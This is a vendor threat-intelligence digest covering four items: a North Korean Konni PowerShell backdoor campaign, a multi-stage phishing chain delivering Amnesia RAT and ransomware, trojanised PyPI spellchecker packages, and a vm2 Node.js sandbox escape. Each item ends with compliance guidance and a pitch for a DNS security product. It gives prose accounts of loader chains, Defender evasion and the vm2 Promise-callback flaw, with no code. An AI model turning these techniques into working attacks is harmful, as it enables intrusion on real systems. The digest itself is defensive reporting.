DigiCert’s Open-Source Intelligence (OSINT) Report – January 23 – January 29, 2026

Konni Hackers Deploy AI-Generated PowerShell Backdoor Against Blockchain Developers

(TLP: CLEAR) North Korean advanced persistent threat (APT) group Konni (also tracked as Opal Sleet/TA406) has been observed conducting a new phishing campaign that leverages AI-generated PowerShell backdoor malware to compromise software developers and engineering teams in the blockchain and crypto sector, expanding its targeting footprint beyond traditional regions such as South Korea, Russia, Ukraine, and Europe into Japan, Australia, and India. According to a Check Point Research technical report, the campaign uses social engineering lures often delivered via spear-phishing emails or Discord links that present seemingly legitimate documents and entice victims to download malicious archives. These archives contain crafted components, including a Windows shortcut (LNK) that triggers a PowerShell loader to extract additional payloads (e.g., a backdoor, batch scripts, and a UAC bypass executable) and establish persistence by creating scheduled tasks.

(TLP: CLEAR) Comments: The embedded PowerShell backdoor exhibits features suggesting it was generated with assistance from AI tools, such as structured modular code and detailed documentation comments, which may streamline development and obfuscation. Once deployed, the backdoor performs anti-analysis checks, establishes persistence, and connects to command-and-control (C2) infrastructure to enable further exploitation of development environments, potentially exposing sensitive assets, credentials, and crypto infrastructure.

(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency Selecting a Protective DNS (PDNS) Service: “A core capability of PDNS is the ability to categorize domain names based on threat intelligence. PDNS services typically leverage open source, commercial, and governmental information feeds of known malicious domains. These feeds enable coverage of domain names found at numerous points of the network exploitation lifecycle. Some solutions may also detect novel malicious domains based on pattern recognition. The types of domains typically addressed by a PDNS system include the following:

• Malware distribution and command and control: Sites known to serve malicious content or used by threat actors to command-and-control malware. For example, these may include sites hosting malicious JavaScript® files or domains that host advertisements that collect information for undesired profiling. PDNS can block and alert on known malicious connection attempts.

 (TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), enforces malware filtering as a network service using 4 distinct malware detection engines, including a dynamic decision engine that compares domain details, DNS query details, query answers, and other data points to determine if a domain is malicious before endpoints can be infected by them.

Source: https://thehackernews.com/2026/01/konni-hackers-deploy-ai-generated.html 

Multi-Stage Phishing Campaign Targets Russia with Amnesia RAT and Ransomware

(TLP: CLEAR) Researchers have identified a sophisticated multi-stage phishing campaign actively targeting users in Russia, which leverages social engineering and chained payload delivery to compromise systems with a remote access Trojan (Amnesia RAT) and ransomware. The attack begins with phishing lures distributed as business-themed documents inside compressed archives; these include Windows shortcut (LNK) files with double extensions designed to appear as innocuous text files. When opened, the LNK triggers a PowerShell script that silently executes and retrieves a first-stage loader from a public GitHub repository, hides execution traces, and displays decoy content to delay user suspicion. Subsequent scripts, including a highly obfuscated Visual Basic Script, run in memory to avoid disk artifacts, escalate privileges through repeated User Account Control (UAC) prompts, and then execute multiple preparatory actions: disabling and bypassing Microsoft Defender protections, configuring exclusions, conducting reconnaissance, and suppressing visibility. The final delivery includes the Amnesia RAT, capable of full remote control, credential theft, and data exfiltration, and a ransomware payload from the Hakuna Matata family that encrypts user files while evading recovery tools.

(TLP: CLEAR) Comments: The campaign highlights abuse of public cloud services (e.g., GitHub for scripts, Dropbox for binaries), layered scripting to evade defenses, and use of native Windows features to disable endpoint protections and achieve persistence, exemplifying how modern phishing attacks can achieve deep compromise without exploiting software vulnerabilities.

(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency Selecting a Protective DNS (PDNS) Service: “A core capability of PDNS is the ability to categorize domain names based on threat intelligence. PDNS services typically leverage open source, commercial, and governmental information feeds of known malicious domains. These feeds enable coverage of domain names found at numerous points of the network exploitation lifecycle. Some solutions may also detect novel malicious domains based on pattern recognition. The types of domains typically addressed by a PDNS system include the following:

• Phishing: Sites known to host applications that maliciously collect personal or organizational information, including credential harvesting scams. These domains may include typo-squats – or close lookalikes of common domains. PDNS can protect users from accidentally connecting to a potentially malicious link.

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunneling to reduce both the quantity and impact of infections.

Source: https://thehackernews.com/2026/01/multi-stage-phishing-campaign-targets.html 

Fake Python Spellchecker Packages on PyPI Delivered Hidden Remote Access Trojan

(TLP: CLEAR) Cybersecurity researchers have uncovered malicious Python packages on the Python Package Index (PyPI)—specifically spellcheckerpy and spellcheckpy—that masqueraded as innocuous spell-checking libraries but, in reality, delivered a remote access Trojan (RAT) to systems that installed them. These packages were collectively downloaded more than a thousand times before removal and were crafted to hide malicious functionality within what appeared to be legitimate Basque language dictionary files; the payload was base64-encoded inside the dictionary data rather than in typical script entry points, helping evade casual detection.

(TLP: CLEAR) Comments: Early versions contained the payload but lacked an execution trigger, however with the release of spellcheckpy v1.2.0 the attacker added an obfuscated trigger that automatically executes the downloader upon importing the package, initiating retrieval of a Python RAT from an external domain. The first stage downloader can fingerprint the host, parse commands, and execute remote instructions, effectively giving attackers persistent remote control over compromised machines. The campaign underscores increasing software supply chain risks where malicious packages with deceptive names and hidden execution logic infiltrate widely used repositories to gain execution context in developer and production environments.

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website categories feeds.

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses Cyber Threat Intelligence feeds, domain categories, and other detection engines to assess DNS queries in realtime and block domains that are being used for phishing, malware delivery, and malware Command and Control (C2). This reduces the quantity and impact of malware infections.

Source: https://thehackernews.com/2026/01/fake-python-spellchecker-packages-on.html 

Critical vm2 Node.js Flaw Allows Sandbox Escape and Arbitrary Code Execution

(TLP: CLEAR) A critical sandbox escape vulnerability has been disclosed in the widely used vm2 Node.js library, tracked as CVE-2026-22709 with a CVSS severity of 9.8/10, that enables an attacker to break out of the sandbox and achieve arbitrary code execution on the host system. vm2 is intended to safely run untrusted JavaScript by proxying objects and sanitizing callback functions, but the flaw lies in its incomplete sanitization of Promise handlers: while the library sanitizes callbacks on its own internal (localPromise) Promise prototype, it fails to sanitize the global Promise prototype (globalPromise.prototype.then and .catch) used by native async functions. Since JavaScript async functions return global promises, malicious code executed within the sandbox can attach unsanitized then/catch callbacks, exploit this oversight, and escape isolation to execute arbitrary host-level operations. 

(TLP: CLEAR) Comments: This issue affects vm2 versions up to 3.10.0 and has been addressed in version 3.10.2 (and later 3.10.3); users are strongly advised to update immediately. The disclosure underscores vm2’s history of sandbox escape issues and the inherent risks of relying on its JavaScript-level isolation, with maintainers recommending stronger alternatives (e.g., isolated-vm or container-based isolation) for robust security.

(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SI-3: “MALICIOUS CODE PROTECTION 

Control: 

• Implement [Selection (one or more): signature based; non-signature based] malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code. 
• Automatically update malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures. 
• Configure malicious code protection mechanisms to: 1. Perform periodic scans of the system [Assignment: organization-defined frequency] and real-time scans of files from external sources at [Selection (one or more): endpoint; network entry and exit points] as the files are downloaded, opened, or executed in accordance with organizational policy; and 2. [Selection (one or more): block malicious code; quarantine malicious code; take [Assignment: organization-defined action]]; and send alert to [Assignment: organization defined personnel or roles] in response to malicious code detection.
• Address the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system.

NIST requires malware detection and prevention solutions. This can be on the device, as with anti-virus agents, but also can be augmented by Protective DNS provided by the network that the device is on or across the Internet. This provides defense-in-depth and support for devices such as Internet of Things (IoT) or some servers that cannot run an endpoint client.

• Malware distribution and command and control: Sites known to serve malicious content or used by threat actors to command-and-control malware. For example, these may include sites hosting malicious JavaScript® files or domains that host advertisements that collect information for undesired profiling. PDNS can block and alert on known malicious connection attempts.

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses from users as well as machines using both defined categories including botnet Command and Control (C2) as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Source: https://thehackernews.com/2026/01/critical-vm2-nodejs-flaw-allows-sandbox.html